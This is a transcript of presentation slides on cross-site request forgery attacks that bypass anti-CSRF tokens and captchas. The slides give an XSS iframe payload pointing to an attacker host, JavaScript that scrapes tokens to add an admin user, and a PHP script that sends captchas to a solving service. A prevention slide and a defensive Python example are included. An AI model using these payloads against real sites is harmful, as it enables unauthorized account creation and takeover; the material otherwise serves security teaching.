Cross Site Request Forgery Attacks
Published in: Technology
Transcript

  • 1. Cross Site Request Forgery Attacks: security token bypass, captcha bypass. Presented by Vlad Horatiu [email_address]
  • 2. What is CSRF
  • 3. Context
    • We have:
      • Access to a web site the victim is likely to visit
      • Cross Site Scripting (XSS) on the domain where the victim has higher privileges
  • 4. Basic principle
    • The victim visits the site we control
    • Via JavaScript, the victim sends requests to the location where they have access, through the XSS.
  • 5. Why do we need XSS?
    • Modern browsers allow AJAX requests, and likewise access to a page's HTML source, only as long as both the request and its target are on the same domain.
    • This protection only restricts access to the source of a page on another domain; it has no impact on loading that page (e.g. in an iframe)
    • Why?
      • Security
      • Implications for web advertising
  • 6. Starting the attack
    • Iframe from the site we control to the one with XSS
    <html>
      <iframe src="http://victimsite.com/index.php?xss=<script>document.write('<iframe src='http://attacker');</script>"
              width="50" height="50"
              style="filter: alpha(opacity=0);-moz-opacity:0;opacity: .0;">
      </iframe>
    </html>
  • 7. Login check
    function check() {
      $.get("login.html", function(data) {
        if (data.indexOf('blanaa') != -1) {
          var logged = tryToLogin();
        } else {
          var logged = true;
        }
      });
    };
    function tryToLogin() {
      $.get("login.html", function(data) {
        $('#form_frame').contents().find('form').submit();
        return (data.indexOf('blanaa') != -1);
      });
    }
  • 8. Token bypass
    • Classic CSRF attack URL:
      • http://victimsite.com/admin/add_admin.php?user=1337hacker&pass=pwned
    • Valid link when token protection is in place:
      • http://victimsite.com/admin/add_admin.php?user=1337hacker&pass=pwned&token=693a93e07e1032751a2f14d00e33a56f
    • Code snippets (PHP):
      • Token generation:
        • mysql_query("INSERT INTO `user_tokens` (`user_id`, `user_token`) VALUES ('". intval($uid) ."', '". sha1(mt_rand(1000000, 9999999).microtime(true)) ."')");
      • Token validation:
        • $query = mysql_query("SELECT `user_token` FROM `user_tokens` WHERE `user_id` = '". intval($uid) ."' LIMIT 1");
        • $token = getQueryToken($query);
        • if($_COOKIE['token'] != $token)
          • die('Esti un bulangiu!');
  • 9. Token bypass
    • JavaScript token crawler
    function addAdmin() {
      $.get("http://victimsite.com/admin/add_user.php", function(data) {
        var token = getBetween('&token=', '&', data);
        alert(token);
        $.get("http://victimsite.com/admin/add_user_success.php?user=1337hacker&pass=pwned&token=" + token, function(data) { });
      });
    };
    function getBetween(lft, rgt, string) {
      // Return the text between the first occurrence of lft and the next rgt.
      var split = string.split(lft);
      split = split[1];
      split = split.split(rgt);
      return split[0];
    }
  • 10. Token bypass
    • JavaScript token crawler (POST)
    function addAdmin() {
      $.get("http://victimsite.com/admin/add_user.php", function(data) {
        var token = getBetween('type="hidden" name="token" value="', '"', data);
        $.post("http://victimsite.com/admin/add_user.php",
               { user: "1337hacker", pass: "pwned", token: token },
               function(data) { });
      });
    };
    function getBetween(lft, rgt, string) {
      // Return the text between the first occurrence of lft and the next rgt.
      var split = string.split(lft);
      split = split[1];
      split = split.split(rgt);
      return split[0];
    }
  • 11. Token bypass
    • Prevention methods
      • Protection against XSS attacks
      • Requiring a captcha for high-risk operations
      • Requiring the password for high-risk operations
      • Using Private Browsing
      • Giving sessions a relatively short expiry
      • Writing the token in a form that is hard for a script to parse (e.g. via obfuscated JavaScript)
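Added example (Python, not the slides' code) contrasting the cookie-equals-stored-token check from slide 8, which a cross-site request passes because the browser sends the cookie on its own, with a synchronizer token bound to the session and the action; the in-memory session store and function names are assumptions. It does not help against the XSS-driven crawler on the earlier slides, which is why XSS protection heads the list above.

```python
import hashlib
import hmac
import secrets

# Constructed in-memory session store standing in for the slides' `user_tokens`
# table (assumption: one CSRF secret per login session).
SESSIONS = {}  # session id -> {"uid": int, "csrf_secret": str}

def create_session(uid):
    sid = secrets.token_urlsafe(24)
    SESSIONS[sid] = {"uid": uid, "csrf_secret": secrets.token_hex(32)}
    return sid

def csrf_token(sid, action):
    # Token derived from the session secret and the action name, so a token
    # rendered into one form does not authorise a different state change.
    secret = SESSIONS[sid]["csrf_secret"].encode()
    return hmac.new(secret, action.encode(), hashlib.sha256).hexdigest()

def validate_slide_style(cookies, db_token):
    # The slides' check: the `token` cookie must equal the stored token. The
    # browser attaches cookies to cross-site requests on its own, so a forged
    # request carries the right cookie and passes.
    return cookies.get("token") == db_token

def validate(cookies, params, action):
    # Fixed check: the token must arrive as a request parameter (something a
    # cross-site form cannot supply) and match the session's expected value.
    sess = SESSIONS.get(cookies.get("session"))
    supplied = params.get("token")
    if sess is None or not supplied:
        return False
    expected = csrf_token(cookies["session"], action)
    return hmac.compare_digest(supplied.encode(), expected.encode())

def demo():
    sid = create_session(uid=1)
    db_token = hashlib.sha1(b"constructed").hexdigest()
    cookies = {"session": sid, "token": db_token}  # sent by the browser automatically
    forged = {"user": "1337hacker", "pass": "pwned"}  # attacker-chosen parameters only
    legit = dict(forged, token=csrf_token(sid, "add_admin"))  # from the real form
    return {
        "slide_check_forged": validate_slide_style(cookies, db_token),
        "fixed_check_forged": validate(cookies, forged, "add_admin"),
        "fixed_check_legit": validate(cookies, legit, "add_admin"),
        "fixed_check_other_action": validate(cookies, legit, "delete_admin"),
    }
```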
  • 12. Token bypass
    • Disadvantages
      • Sensitive to changes in the HTML structure
  • 13. Flash Cross-domain policy
    • Lets us make AJAX requests between two different domains
    • The target domain must list the source domain in a "whitelist": crossdomain.xml
    • Example crossdomain.xml:
    <cross-domain-policy>
      <allow-access-from domain="*"/>
    </cross-domain-policy>
  • 14. Captcha bypass
    • Context
      • The user's username and password fields are filled in thanks to autocomplete
      • The login form requires captcha verification
    • Basic principle
      • Grabbing the image path via JavaScript
      • Sending the image to a captcha-breaking script (via crossdomain.xml)
      • Sending the login information
  • 15. Captcha bypass
    • Captcha breaking script snippet:
    // $client is a DeathByCaptcha API client instance; its construction is not shown on the slide.
    $rand = sha1(mt_rand(1000000, 9999999).microtime(true));
    if (isset($_GET['path']))
      file_put_contents($rand.'.jpg', file_get_contents($_GET['path']));
    if ($captcha = $client->upload($rand.'.jpg')) {
      echo "CAPTCHA {$captcha['captcha']} uploaded\n";
      sleep(DeathByCaptcha_Client::DEFAULT_TIMEOUT);
      if ($text = $client->get_text($captcha['captcha'])) {
        echo $text;
      } else {
        $client->remove($captcha['captcha']);
        echo '0';
      }
    }
  • 16. Captcha bypass
    • Disadvantages
      • The long time needed to solve the captcha
        • For the method to work, the user would have to stay on the page for at least a minute
      • The high cost of captcha solving
      • Changes in the HTML structure
      • Flash Player must be present on the victim's system
  • 17. Concrete examples
    • Adding users to a WordPress platform
    • Adding a MySQL user
  • 18. Questions
